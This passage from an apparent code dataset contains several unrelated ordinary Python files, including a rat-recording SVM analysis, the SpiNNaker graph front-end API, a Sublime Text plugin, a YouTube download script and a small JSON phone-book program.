re.search(r\"_alt_(\\d)\", filename).group(1)\r\n with open(filename, \"rb\") as fin:\r\n Files_Dict[int(ID_rat)][int(alt)] = pickle.load(fin)\r\n return Files_Dict\r\n\r\n\r\ndef aux_bin_middle(bin_edges):\r\n \"\"\"\r\n Find centrpoints of the bins.\r\n Auxiliary function.\r\n\r\n Parameters\r\n ----------\r\n bin_edges : array of dtype float\r\n array specifying the edges.\r\n\r\n Returns\r\n -------\r\n bin_centers : numpy.array\r\n array of bin centers.\r\n\r\n \"\"\"\r\n bin_centers = []\r\n for i in range(len(bin_edges) - 1):\r\n center = bin_edges[i] + (float(bin_edges[i + 1]) - float(bin_edges[i]))/2.\r\n bin_centers.append(center)\r\n return np.array(bin_centers)\r\n\r\n\r\ndef evaluate_stats(df_rat, kresli=False):\r\n \"\"\"\r\n Create the features for ML algorithm.\r\n\r\n Parameters\r\n ----------\r\n df_rat : pandas.dataframe\r\n Dataframe of 1 recording.\r\n kresli : boolean, optional\r\n If the plot of polar transform should be plotted.. The default is False.\r\n\r\n Returns\r\n -------\r\n phi_vertex : float\r\n Attractor rotation.\r\n r_circumscribed : float\r\n Attractor size circumscribed.\r\n vertex_width : float\r\n Width in vertex.\r\n vertex_count : integer\r\n Count in vertex.\r\n phi_edge : float\r\n Attractor rotation defined by the edge.\r\n r_inscribed : float\r\n Attractor size inscribed.\r\n edge_width : float\r\n Width in edge.\r\n edge_count : integer\r\n Count in edge.\r\n\r\n \"\"\"\r\n bin_mean, bin_edges, binnumber = stats.binned_statistic(x=df_rat.phi, values=df_rat.r, bins=100, statistic='mean')\r\n bin_std, bin_edges, binnumber = stats.binned_statistic(x=df_rat.phi, values=df_rat.r, bins=100, statistic='std')\r\n bin_hist, bin_edges, binnumber = stats.binned_statistic(x=df_rat.phi, values=df_rat.r, bins=100, statistic='count')\r\n\r\n if kresli:\r\n f1 = sns.jointplot(data=df_rat, x=\"phi\", y=\"r\", color='#85C0F9')\r\n f1.ax_joint.hlines(bin_mean, bin_edges[:-1], bin_edges[1:], colors='#A95AA1', lw=2, label='binned statistic of data')\r\n f1.ax_joint.vlines(aux_bin_middle(bin_edges), bin_mean - bin_std, bin_mean + bin_std, colors='#0F2080')\r\n plt.figure()\r\n plt.axes(projection='polar')\r\n plt.polar(df_rat.phi, df_rat.r)\r\n\r\n bin_mids = aux_bin_middle(bin_edges)\r\n\r\n mask_limit = ((bin_mids < 0) & (bin_mids > -2)) # To make sure that we find the first extreme value\r\n max_index = bin_mean[mask_limit].argmax()\r\n phi_vertex = bin_mids[mask_limit][max_index]\r\n r_circumscribed = bin_mean[mask_limit][max_index]\r\n vertex_width = bin_std[mask_limit][max_index]\r\n vertex_count = bin_hist[mask_limit][max_index]\r\n\r\n mask_limit_moved = ((bin_mids < phi_vertex + 2/3*math.pi) & (bin_mids > phi_vertex))\r\n min_index = bin_mean[mask_limit_moved].argmin()\r\n phi_edge = bin_mids[mask_limit_moved][min_index]\r\n r_inscribed = bin_mean[mask_limit_moved][min_index]\r\n edge_width = bin_std[mask_limit_moved][min_index]\r\n edge_count = bin_hist[mask_limit_moved][min_index]\r\n\r\n return phi_vertex, r_circumscribed, vertex_width, vertex_count, phi_edge, r_inscribed, edge_width, edge_count\r\n\r\n\r\nX_dict = {42: {0: {}, 1: {}, 2: {}},\r\n 52: {0: {}, 1: {}, 2: {}},\r\n 74: {0: {}, 1: {}, 2: {}, 3: {}},\r\n 146: {0: {}, 1: {}, 2: {}, 3: {}}}\r\n\r\noptimal_values = load_optimal_values()\r\n\r\n\r\n###############################################################################\r\n# Here we load the files prepared in method3_prepare_dataset.py and do the transformations.\r\n# Some loading function needs to be imported form method3_find_optimal.\r\n# Data are then transformed into polar by functions defined above.\r\n# This takes several minute, so we saved the results after the first time.\r\n# We commented the block and each time only load the already transformed data from file 'prepared_dict_5min'.\r\n###############################################################################\r\n\r\n# =============================================================================\r\n# from method3_find_optimal import *\r\n# dict_rats = load_dict_dialog()\r\n#\r\n#\r\n# for ID_rat,v in dict_rats.items():\r\n# for alt,u in tqdm(v.items()):\r\n# for hour,w in u.items():\r\n# X_dict[ID_rat][alt][hour] = create_new_variables(w, [t[1] for t in optimal_values[ID_rat][alt] if t[0]==hour][0])\r\n# X_dict[ID_rat][alt][hour] = find_polar_r(X_dict[ID_rat][alt][hour])\r\n# X_dict[ID_rat][alt][hour] = find_polar_phi(X_dict[ID_rat][alt][hour])\r\n# =============================================================================\r\n\r\n# =============================================================================\r\n# with open('prepared_dict_5min', \"wb\") as fin:\r\n# pickle.dump(X_dict, fin)\r\n# =============================================================================\r\n\r\nwith open('C:/Users/ide23/Documents/Diplo/prepared_dict_5min', \"rb\") as fin:\r\n X_dict = pickle.load(fin)\r\n\r\n\r\nid_strain_map = {\r\n 42:'HanSD',\r\n 52:'TGR',\r\n 74:'SHR',\r\n 146:'WT'\r\n }\r\n\r\nX_df = pd.DataFrame(columns=['ID_rat', 'alt', 'hour', 'phi_vertex',\r\n 'r_circumscribed', 'vertex_width',\r\n 'vertex_edge_count_ration', 'phi_edge',\r\n 'r_inscribed', 'edge_width', 'tau'])\r\nfor ID_rat, v in X_dict.items():\r\n for alt, u in tqdm(v.items()):\r\n for hour, w in u.items():\r\n stat = list(evaluate_stats(w))\r\n novy_riadok = {\r\n 'ID_rat': int(ID_rat),\r\n 'alt': int(alt),\r\n 'hour': int(hour),\r\n 'phi_vertex': stat[0],\r\n 'r_circumscribed': stat[1],\r\n 'vertex_width': stat[2],\r\n 'vertex_edge_count_ration': stat[3]/stat[7],\r\n 'phi_edge': stat[4],\r\n 'r_inscribed': stat[5],\r\n 'edge_width': stat[6],\r\n 'tau': [t[1] for t in optimal_values[ID_rat][alt] if t[0] == hour][0]\r\n }\r\n X_df = X_df.append(novy_riadok, ignore_index=True)\r\n\r\n\r\nX_df['strain'] = X_df['ID_rat'].map(id_strain_map)\r\n\r\nX = X_df[['phi_vertex', 'r_circumscribed', 'vertex_width',\r\n 'vertex_edge_count_ration', 'phi_edge',\r\n 'r_inscribed', 'edge_width', 'tau']].to_numpy()\r\ny = np.ravel(X_df[['strain']].to_numpy())\r\n\r\nX_train, X_test, y_train, y_test = train_test_split(X, y,\r\n test_size=0.3,\r\n random_state=42)\r\n\r\nscaler = StandardScaler()\r\nscaler.fit(X_train)\r\nX_train = scaler.transform(X_train)\r\nX_test = scaler.transform(X_test)\r\n\r\n\r\nparam_grid = {\r\n 'C': [2**(2*i-1) for i in range(-2, 9)],\r\n 'kernel': ['linear']\r\n }\r\n\r\nclf = GridSearchCV(SVC(),\r\n param_grid,\r\n scoring='f1_micro',\r\n n_jobs = -1)\r\nclf.fit(X_train, y_train)\r\nprint(\"Best parameter (CV score=%0.3f):\" % clf.best_score_)\r\nprint(clf.best_params_)\r\n\r\nclf.best_estimator_.predict(X_train)\r\npred = clf.best_estimator_.predict(X_test)\r\n\r\nprint(confusion_matrix(y_test, pred))\r\nprint(classification_report(y_test, pred))\r\n\r\n\r\ndef f_importances(coef, names):\r\n \"\"\"\r\n Evaluate feature importance of features with linear kernel.\r\n\r\n Parameters\r\n ----------\r\n coef : list\r\n List of coef. values.\r\n names : list\r\n List of coef. names.\r\n\r\n Returns\r\n -------\r\n None.\r\n\r\n \"\"\"\r\n imp = coef\r\n imp, names = zip(*sorted(zip(imp, names)))\r\n plt.barh(range(len(names)), imp, align='center')\r\n plt.yticks(range(len(names)), names)\r\n plt.show()\r\n\r\n\r\nfeatures_names = ['phi_vertex', 'r_circumscribed', 'vertex_width',\r\n 'vertex_edge_count_ration', 'phi_edge',\r\n 'r_inscribed', 'edge_width', 'tau']\r\nf_importances(clf.best_estimator_.coef_[0], features_names)\r\n\r\n\r\ndef vykresli_animaciu(dict_potkan, optimal_values):\r\n from method3_find_optimal import create_histograms\r\n from matplotlib import animation\r\n fig = plt.figure(figsize=[20, 10], frameon=False)\r\n\r\n cmap = colors.LinearSegmentedColormap.from_list(\"\", [\"#d5f2f5\", \"#002e47\", \"#eb6d19\"])\r\n\r\n ax1 = fig.add_subplot(2, 2, 1)\r\n ax2 = fig.add_subplot(2, 2, 2)\r\n ax3 = fig.add_subplot(2, 2, 3)\r\n ax4 = fig.add_subplot(2, 2, 4)\r\n\r\n ims = []\r\n for hour in range(0, 24):\r\n H1 = create_histograms(dict_potkan[42][0][str(hour)])[0]\r\n H2 = create_histograms(dict_potkan[52][0][str(hour)])[0]\r\n H3 = create_histograms(dict_potkan[74][0][str(hour)])[0]\r\n H4 = create_histograms(dict_potkan[146][0][str(hour)])[0]\r\n\r\n im1 = ax1.imshow(np.sqrt(H1), cmap=cmap,\r\n extent=[-H1.shape[1]/2., H1.shape[1]/2., -H1.shape[0]/2., H1.shape[0]/2.],\r\n animated=True,)\r\n im2 = ax2.imshow(np.sqrt(H2), cmap=cmap,\r\n extent=[-H1.shape[1]/2., H1.shape[1]/2., -H1.shape[0]/2., H1.shape[0]/2.],\r\n animated=True)\r\n im3 = ax3.imshow(np.sqrt(H3), cmap=cmap,\r\n extent=[-H1.shape[1]/2., H1.shape[1]/2., -H1.shape[0]/2., H1.shape[0]/2.],\r\n animated=True)\r\n im4 = ax4.imshow(np.sqrt(H4), cmap=cmap,\r\n extent=[-H1.shape[1]/2., H1.shape[1]/2., -H1.shape[0]/2., H1.shape[0]/2.],\r\n animated=True)\r\n\r\n cas1 = ax1.text(0.5, 0.90, 'hour: ' + str(hour), ha=\"center\", va=\"bottom\",\r\n fontsize=\"large\", transform = ax1.transAxes)\r\n\r\n tau1 = ax1.text(0.5, 0.10, 'Tau: ' + str([t[1] for t in optimal_values[42][0] if t[0] == str(hour)][0]),\r\n ha=\"center\", va=\"bottom\", fontsize=\"large\", transform=ax1.transAxes)\r\n\r\n cas2 = ax2.text(0.5, 0.90, 'hour: ' + str(hour), ha=\"center\", va=\"bottom\",\r\n fontsize=\"large\", transform=ax2.transAxes)\r\n\r\n tau2 = ax2.text(0.5, 0.10, 'Tau: ' + str([t[1] for t in optimal_values[52][0] if t[0] == str(hour)][0]),\r\n ha=\"center\", va=\"bottom\", fontsize=\"large\", transform=ax2.transAxes)\r\n\r\n cas3 = ax3.text(0.5, 0.90, 'hour: ' + str(hour), ha=\"center\", va=\"bottom\",\r\n fontsize=\"large\", transform=ax3.transAxes)\r\n\r\n tau3 = ax3.text(0.5, 0.10, 'Tau: ' + str([t[1] for t in optimal_values[74][0] if t[0] == str(hour)][0]),\r\n ha=\"center\", va=\"bottom\", fontsize=\"large\", transform=ax3.transAxes)\r\n\r\n cas4 = ax4.text(0.5, 0.90, 'hour: ' + str(hour), ha=\"center\", va=\"bottom\",\r\n fontsize=\"large\", transform=ax4.transAxes)\r\n\r\n tau4 = ax4.text(0.5, 0.10, 'Tau: ' + str([t[1] for t in optimal_values[146][0] if t[0] == str(hour)][0]),\r\n ha=\"center\", va=\"bottom\", fontsize=\"large\", transform=ax4.transAxes)\r\n ims.append([im1, im2, im3, im4, cas1, tau1, cas2, tau2, cas3, tau3, cas4, tau4])\r\n ani = animation.ArtistAnimation(fig, ims, interval=5000, blit=True,\r\n repeat_delay=100)\r\n\r\n\r\n writergif = animation.PillowWriter(fps=2)\r\n ani.save(\"trojuholnik_porovnanie_upgrade_vsetky.gif\",\r\n writer=writergif, dpi = 300)","sub_path":"method3_analysis.py","file_name":"method3_analysis.py","file_ext":"py","file_size_in_byte":13471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"268653236","text":"# front end common imports\nfrom spinn_front_end_common.utilities.notification_protocol.socket_address \\\n import SocketAddress\nfrom spinn_front_end_common.utilities.utility_objs.executable_finder \\\n import ExecutableFinder\n\n# graph front end imports\nfrom spinnaker_graph_front_end._version import \\\n __version__, __version_name__, __version_month__, __version_year__\nfrom spinnaker_graph_front_end.spinnaker import SpiNNaker\n\n# utility models for graph front ends\nfrom spinn_front_end_common.utility_models.live_packet_gather \\\n import LivePacketGather # @IgnorePep8\nfrom spinn_front_end_common.utility_models.reverse_ip_tag_multi_cast_source \\\n import ReverseIpTagMultiCastSource # @IgnorePep8\nfrom pacman.model.graphs.machine.impl.machine_edge \\\n import MachineEdge # @IgnorePep8\n\n\nimport logging\nimport inspect\nimport sys\nlogger = logging.getLogger(__name__)\n\n\n_spinnaker = None\n_none_labelled_vertex_count = None\n_none_labelled_edge_count = None\n\n\ndef setup(hostname=None, graph_label=None, model_binary_module=None,\n model_binary_folder=None, database_socket_addresses=None,\n user_dsg_algorithm=None, n_chips_required=None,\n extra_pre_run_algorithms=None, extra_post_run_algorithms=None,\n time_scale_factor=None, machine_time_step=None):\n \"\"\"\n\n :param hostname:\\\n the hostname of the SpiNNaker machine to operate on\\\n (over rides the machine_name from the cfg file).\n :type hostname: str\n :param graph_label:\\\n a human readable label for the graph (used mainly in reports)\n :type graph_label: str\n :param model_binary_module:\\\n the module where the binary files can be found for the c code that is \\\n being used in this application; mutually exclusive with the \\\n model_binary_folder.\n :type model_binary_module: python module\n :param model_binary_folder:\\\n the folder where the binary files can be found for the c code that is\\\n being used in this application; mutually exclusive with the\\\n model_binary_module.\n :type model_binary_folder: str\n :param database_socket_addresses:\\\n set of SocketAddresses that need to be added for the database\\\n notification functionality. This are over and above the ones used by\\\n the LiveEventConnection\n :type database_socket_addresses: list of SocketAddresses\n :param user_dsg_algorithm:\\\n an algorithm used for generating the application data which is loaded\\\n onto the machine. if not set, will use the data specification language\\\n algorithm required for the type of graph being used.\n :type user_dsg_algorithm: str\n :param n_chips_required:\\\n if you need to be allocated a machine (for spalloc) before building\\\n your graph, then fill this in with a general idea of the number of\\\n chips you need so that the spalloc system can allocate you a machine\\\n big enough for your needs.\n :type n_chips_required: int\n :param extra_pre_run_algorithms:\\\n algorithms which need to be ran after mapping and loading has occurred\\\n but before the system has ran. These are plugged directly into the\\\n work flow management.\n :type extra_post_run_algorithms: list of str\n :param extra_post_run_algorithms:\\\n algorithms which need to be ran after the simulation has ran. These\\\n could be post processing of generated data on the machine for example.\n :type extra_pre_run_algorithms: list of str\n \"\"\"\n from spinnaker_graph_front_end import spinnaker\n import os\n global _spinnaker\n global _none_labelled_vertex_count\n global _none_labelled_edge_count\n\n logger.info(\n \"SpiNNaker graph front end (c) {}, \"\n \"University of Manchester\".format(__version_year__))\n parent_dir = os.path.split(os.path.split(\n spinnaker.__file__)[0])[0]\n logger.info(\n \"Release version {}({}) - {} {}. Installed in folder {}\".format(\n __version__, __version_name__, __version_month__, __version_year__,\n parent_dir))\n\n # add the directories where the binaries are located\n executable_finder = ExecutableFinder()\n if model_binary_module is not None:\n executable_finder.add_path(\n os.path.dirname(model_binary_module.__file__))\n elif model_binary_folder is not None:\n executable_finder.add_path(model_binary_folder)\n else:\n file_dir = os.path.dirname(os.path.abspath(sys.argv[0]))\n executable_finder.add_path(file_dir)\n\n # set up the spinnaker object\n _spinnaker = SpiNNaker(\n host_name=hostname, graph_label=graph_label,\n executable_finder=executable_finder,\n database_socket_addresses=database_socket_addresses,\n dsg_algorithm=user_dsg_algorithm,\n n_chips_required=n_chips_required,\n extra_pre_run_algorithms=extra_pre_run_algorithms,\n extra_post_run_algorithms=extra_post_run_algorithms,\n machine_time_step=machine_time_step,\n time_scale_factor=time_scale_factor)\n\n\ndef run(duration=None):\n \"\"\" Method to support running an application for a number of microseconds\n\n :param duration: the number of microseconds the application should run for\n :type duration: int\n \"\"\"\n global _spinnaker\n\n _spinnaker.run(duration)\n\n\ndef stop():\n \"\"\" Do any necessary cleaning up before exiting. Unregisters the controller\n \"\"\"\n global _spinnaker\n global _executable_finder\n\n _spinnaker.stop()\n _spinnaker = None\n _executable_finder = None\n\n\ndef read_xml_file(file_path):\n \"\"\" Reads a xml file and translates it into an application graph and \\\n machine graph (if required)\n\n :param file_path: the file path in absolute form\n :return: None\n \"\"\"\n global _spinnaker\n logger.warn(\"This functionality is not yet supported\")\n _spinnaker.read_xml_file(file_path)\n\n\ndef add_vertex(cellclass, cellparams, label=None, constraints=None):\n \"\"\"\n\n :param cellclass: the class object for creating the vertex\n :param cellparams: the input params for the class object\n :param constraints: any constraints to be applied to the vertex once built\n :param label: the label for this vertex\n :type cellclass: python object\n :type cellparams: dictionary of name and value\n :type constraints: list of AbstractConstraint\n :type label: str\n :return: the vertex instance object\n \"\"\"\n global _spinnaker\n\n # correct label if needed\n if label is None and 'label' not in cellparams:\n label = \"Vertex {}\".format(_spinnaker.none_labelled_vertex_count)\n _spinnaker.increment_none_labelled_vertex_count()\n cellparams['label'] = label\n elif 'label' in cellparams and cellparams['label'] is None:\n label = \"Vertex {}\".format(_spinnaker.none_labelled_vertex_count)\n _spinnaker.increment_none_labelled_vertex_count()\n cellparams['label'] = label\n elif label is not None:\n cellparams['label'] = label\n\n # add vertex\n cellparams['constraints'] = constraints\n vertex = cellclass(**cellparams)\n _spinnaker.add_application_vertex(vertex)\n return vertex\n\n\ndef add_vertex_instance(vertex_to_add):\n \"\"\"\n :param vertex_to_add: vertex instance to add to the graph\n :type vertex_to_add: instance of AbstractPartitionabelVertex\n :return: None\n \"\"\"\n global _spinnaker\n _spinnaker.add_application_vertex(vertex_to_add)\n\n\ndef add_machine_vertex(\n cellclass, cellparams, label=None, constraints=None):\n \"\"\"\n\n :param cellclass: the class object for creating the vertex\n :param cellparams: the input params for the class object\n :param constraints: any constraints to be applied to the vertex once built\n :param label: the label for this vertex\n :type cellclass: python object\n :type cellparams: dictionary of name and value\n :type constraints: list of AbstractConstraint\n :type label: str\n :return: the vertex instance object\n \"\"\"\n global _spinnaker\n\n # correct label if needed\n if label is None and 'label' not in cellparams:\n label = \"Vertex {}\".format(_spinnaker.none_labelled_vertex_count)\n _spinnaker.increment_none_labelled_vertex_count()\n cellparams['label'] = label\n elif 'label' in cellparams and cellparams['label'] is None:\n label = \"Vertex {}\".format(_spinnaker.none_labelled_vertex_count)\n _spinnaker.increment_none_labelled_vertex_count()\n cellparams['label'] = label\n elif label is not None:\n cellparams['label'] = label\n\n # add vertex\n cellparams['constraints'] = constraints\n vertex = cellclass(**cellparams)\n _spinnaker.add_machine_vertex(vertex)\n return vertex\n\n\ndef add_machine_vertex_instance(vertex_to_add):\n \"\"\"\n\n :param vertex_to_add: the vertex to add to the partitioned graph\n :return: None\n \"\"\"\n global _spinnaker\n _spinnaker.add_machine_vertex(vertex_to_add)\n\n\ndef add_edge(cell_type, cellparams, semantic_label, label=None):\n \"\"\"\n\n :param cell_type:\n :param cellparams:\n :param semantic_label:\n :param constraints:\n :param label:\n :return:\n \"\"\"\n global _spinnaker\n\n # correct label if needed\n if label is None and 'label' not in cellparams:\n label = \"Edge {}\".format(_spinnaker.none_labelled_edge_count)\n _spinnaker.increment_none_labelled_edge_count()\n cellparams['label'] = label\n elif 'label' in cellparams and cellparams['label'] is None:\n label = \"Edge {}\".format(_spinnaker.none_labelled_edge_count)\n _spinnaker.increment_none_labelled_edge_count()\n cellparams['label'] = label\n elif label is not None:\n cellparams['label'] = label\n\n # add edge\n edge = cell_type(**cellparams)\n _spinnaker.add_application_edge(edge, semantic_label)\n return edge\n\n\ndef add_application_edge_instance(edge, partition_id):\n \"\"\"\n\n :param edge:\n :param partition_id:\n :return:\n \"\"\"\n _spinnaker.add_application_edge(edge, partition_id)\n\n\ndef add_machine_edge_instance(edge, partition_id):\n \"\"\"\n\n :param edge:\n :param partition_id:\n :return:\n \"\"\"\n _spinnaker.add_machine_edge(edge, partition_id)\n\n\ndef add_machine_edge(cellclass, cellparams, semantic_label, label=None):\n \"\"\"\n\n :param cellclass:\n :param cellparams:\n :param semantic_label:\n :param label:\n :return:\n \"\"\"\n global _spinnaker\n\n # correct label if needed\n if label is None and 'label' not in cellparams:\n label = \"Edge {}\".format(_spinnaker.none_labelled_edge_count)\n _spinnaker.increment_none_labelled_edge_count()\n cellparams['label'] = label\n elif 'label' in cellparams and cellparams['label'] is None:\n label = \"Edge {}\".format(_spinnaker.none_labelled_edge_count)\n _spinnaker.increment_none_labelled_edge_count()\n cellparams['label'] = label\n elif label is not None:\n cellparams['label'] = label\n\n # add edge\n edge = cellclass(**cellparams)\n _spinnaker.add_machine_edge(edge, semantic_label)\n return edge\n\n\ndef add_socket_address(\n database_ack_port_num, database_notify_host, database_notify_port_num):\n \"\"\"\n adds a socket address for the notification protocol\n :param database_ack_port_num: port num to send acknowledgement to\n :param database_notify_host: host ip to send notification to\n :param database_notify_port_num: port that the external device will be\n notified on.\n \"\"\"\n global _spinnaker\n\n database_socket = SocketAddress(\n listen_port=database_ack_port_num,\n notify_host_name=database_notify_host,\n notify_port_no=database_notify_port_num)\n\n _spinnaker.add_socket_address(database_socket)\n\n\ndef get_txrx():\n \"\"\"\n returns the transceiver used by the tool chain\n :return:\n \"\"\"\n global _spinnaker\n return _spinnaker.transceiver\n\n\ndef get_machine_dimensions():\n \"\"\"\n returns the x and y dimension of the machine\n :return:\n \"\"\"\n global _spinnaker\n return _spinnaker.get_machine_dimensions()\n\n\ndef get_number_of_cores_on_machine():\n \"\"\"\n returns the number of cores on this machine\n :return:\n \"\"\"\n global _spinnaker\n this_machine = _spinnaker.machine\n cores, _ = this_machine.get_cores_and_link_count()\n return cores\n\n\ndef has_ran():\n \"\"\"\n\n :return:\n \"\"\"\n global _spinnaker\n return _spinnaker.has_ran\n\n\ndef machine_time_step():\n \"\"\"\n\n :return:\n \"\"\"\n global _spinnaker\n return _spinnaker.machine_time_step\n\n\ndef no_machine_time_steps():\n \"\"\"\n\n :return:\n \"\"\"\n global _spinnaker\n return _spinnaker.no_machine_time_steps\n\n\ndef timescale_factor():\n \"\"\"\n\n :return:\n \"\"\"\n global _spinnaker\n return _spinnaker.time_scale_factor\n\n\ndef machine_graph():\n \"\"\"\n\n :return:\n \"\"\"\n global _spinnaker\n return _spinnaker.machine_graph\n\n\ndef application_graph():\n \"\"\"\n\n :return:\n \"\"\"\n global _spinnaker\n return _spinnaker.application_graph\n\n\ndef routing_infos():\n \"\"\"\n\n :return:\n \"\"\"\n global _spinnaker\n return _spinnaker.routing_infos\n\n\ndef placements():\n \"\"\"\n\n :return:\n \"\"\"\n global _spinnaker\n return _spinnaker.placements\n\n\ndef transceiver():\n \"\"\"\n\n :return:\n \"\"\"\n global _spinnaker\n return _spinnaker.transceiver\n\n\ndef graph_mapper():\n \"\"\"\n\n :return:\n \"\"\"\n global _spinnaker\n return _spinnaker.graph_mapper\n\n\ndef buffer_manager():\n \"\"\"\n returns the buffer manager being used for loading/extracting buffers\n :return:\n \"\"\"\n global _spinnaker\n return _spinnaker.buffer_manager\n\n\ndef machine():\n \"\"\"\n\n :return:\n \"\"\"\n global _spinnaker\n return _spinnaker.machine\n\n\ndef is_allocated_machine():\n return SpiNNaker.is_allocated_machine\n","sub_path":"spinnaker_graph_front_end/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":13782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"434572596","text":"import sublime\nimport sublime_plugin\n\nclass Listener(sublime_plugin.EventListener):\n\n def on_new( self, view ):\n settings = sublime.load_settings(\"default_file_type.sublime-settings\")\n\n if settings.get('use_current_syntax') and view:\n syntax = view.settings().get('syntax')\n else:\n syntax = settings.get('default_new_syntax')\n\n # sublime.error_message(\"%s\" % syntax)\n view.set_syntax_file(syntax)","sub_path":"default_file_type.py","file_name":"default_file_type.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"3625842","text":"# import pytube\n#\n# video_link='https://www.youtube.com/watch?v=7IXJbCm6hEE'\n# yt=pytube.YouTube(video_link)\n# videos=yt.streams.all()\n# videos.download('C:\\Users\\Public\\Videos')\n#\n\n# from pytube import YouTube\n#\n# yt = YouTube('https://www.youtube.com/watch?v=aBO4GWEtVtc')\n#\n# print(yt.title)\n#\n# stream = yt.streams.first()\n#\n# stream.download()\n\nfrom pytube import YouTube\nimport os\nimport requests\nreq = requests.get(input(\"Enter the video link: \"))\nprint(str(req))\nyt = YouTube(input(\"Enter the video link: \"))\n\ntry:\n videos = yt.streams.all()\n\n s = 1\n for v in videos:\n print(str(s)+\". \"+str(v))\n s += 1\n\n n = int(input(\"Enter the number of the video: \"))\n video = videos[n - 1]\n\n # destination = input(\"Enter the destination: \")\n des = os.path.dirname('C:\\\\Users\\\\Vitez SDFVDFDoftware LAB\\\\Downloads\\\\yt')\n video.download(des)\n print(\"Has been successfully downloaded\")\n\nexcept Exception as e:\n print('----------------------------',e)\n\n","sub_path":"you.py","file_name":"you.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"415956394","text":"import pandas as pd\nimport numpy as np\nimport xlrd\n\nfrom pandas import ExcelFile\n\ndef xlxs_to_matrix(filename):\n df = pd.read_excel(filename)\n matrix = df.as_matrix()\n matrix = np.asarray(matrix)\n for l in matrix:\n l[0] -= 1\n l[2] -= 1\n\n return matrix\n\ndef file_to_info(filename):\n names = [\"D_INITIAL\", \"C_INITIAL\", \"A_INITIAL\", \"DFH\", \"DFC\", \"C_ELAPSED_TIME\",\n \"ADDITIONAL\", \"C_NOT_ALLOWED\", \"MORE_C_SLOTS\", \"PUBLIC_HOLIDAYS\",\n \"A_NOT_ALLOWED\", \"MORE_A_SLOTS\"]\n info = []\n\n for i in range(12):\n df = pd.read_excel(filename, sheet_name=names[i])\n matrix = df.as_matrix()\n matrix = np.asarray(matrix)\n info.append(matrix)\n\n return info\n\n","sub_path":"env/excel_parser.py","file_name":"excel_parser.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"382433667","text":"#-*- coding: utf-8 -*-\r\n#Meu Vigésimo terceiro Programa\r\n#Trabalhando com Graficos e Visualização de Dados\r\n#importando a biblioteca\r\nimport matplotlib.pyplot as plt\r\n\r\nx = [1,3,5,7,9]\r\ny = [2,3,7,1,2]\r\n\r\n\r\ntitulo=\"Gráfico de Barras - Compare\"\r\neixox= \"Eixo X\"\r\neixoy = \"Eixo Y\"\r\n\r\n#Legendas\r\nplt.title(titulo)\r\nplt.xlabel(eixox)\r\nplt.ylabel(eixoy)\r\n\r\n#Setar dados no graficos\r\nplt.plot(x,y,color=\"k\", linestyle=\"-\")\r\nplt.scatter(x,y, label = \"Meus pontos\", color=\"r\", marker=\".\", s=100)\r\n#mostrar legenda\r\nplt.legend()\r\n#mostrar grafico\r\nplt.show()\r\nplt.savefig(\"figura1.png\",dpi=300)\r\n","sub_path":"saveFig.py","file_name":"saveFig.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"635091364","text":"def removeOr(sentence):\n \"\"\"\n removes \" | \" from sentence and returns list of sentences \n \"\"\"\n sub_predicates = []\n while \" | \" in sentence:\n index_of_or = sentence.find(\" | \")\n first_half = sentence[:index_of_or]\n sub_predicates.append(first_half)\n sentence = sentence.replace(first_half, \"\").replace(\" | \", \"\",1).strip()\n sub_predicates.append(sentence)\n return sub_predicates\n\n\nif __name__ == \"__main__\":\n print(removeOr(\"namasye(x,y) | hello(s) | as(7)\"))","sub_path":"unit_testing/removeOr.py","file_name":"removeOr.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"6001997","text":"#!/usr/bin/python3\nfrom os import system,name\n# import sleep to show output for some time period \nfrom time import sleep \n \n# define our clear function \ndef clear(): \n \n # for windows \n if name == 'nt': \n _ = system('cls') \n \n # for mac and linux(here, os.name is 'posix') \n else: \n _ = system('clear')\nimport sys\nimport json\ndef listele():\n with open(\"rehber.json\") as file:\n rehber=json.load(file)\n print(f\"{'#':<4}{'Name':<15}{'Last-Name':<15}{'Phone_number':<20}\") \n for key in rehber:\n print(f'{key:<2}--{rehber[key][\"name\"]:<15}{rehber[key][\"last_name\"]:<15}{rehber[key][\"phone_number\"]:<20}')\n\nwhile True:\n print(\"-\"*54)\n print(\"[ 0 ] - list of records\")\n print(\"[ 1 ] - new records\")\n print(\"[ 2 ] - modify record\")\n print(\"[ 3 ] - delete record\")\n print(\"[q/Q] - Quit\")\n print(\"-\"*54)\n opt=input(\"enter your choice:\")\n if opt == \"0\": # listing \n listele() \n elif opt==\"1\": #new record\n with open(\"rehber.json\") as file:\n rehber=json.load(file)\n\n no = len(rehber)+1\n rehber[str(no)]={\"name\": \"\", \"last_name\": \"\", \"phone_number\": \"\"}\n rehber[str(no)][\"name\"] = input(\"Enter the Name:\")\n rehber[str(no)][\"last_name\"] = input(\"Enter the Last_Name:\")\n rehber[str(no)][\"phone_number\"] = input(\"Enter the phone_number:\")\n with open(\"rehber.json\",\"w\") as file:\n j=json.dumps(rehber, indent=2)\n file.write(j)\n file.close()\n clear()\n elif opt == \"2\": #modify\n listele()\n with open(\"rehber.json\") as file:\n rehber=json.load(file)\n i = str(input(\"Enter # to be modified:\"))\n # for key in list(rehber):\n # if rehber[key][\"name\"] == i.lower():\n # rehber[key][\"name\"] = input(\"Enter the Name:\")\n # rehber[key][\"last_name\"] = input(\"Enter the Last_Name:\")\n # rehber[key][\"phone_number\"] = input(\"Enter the phone_number:\")\n rehber[i][\"name\"] = input(f\"change name of {rehber[i]['name']} as:\")\n rehber[i][\"last_name\"] = input(f\"change last_name of {rehber[i]['last_name']} as:\")\n rehber[i][\"phone_number\"] = input(f\"change phone_number of {rehber[i]['phone_number']} as:\")\n \n with open(\"rehber.json\",\"w\") as file:\n j=json.dumps(rehber, indent=2)\n file.write(j)\n file.close()\n 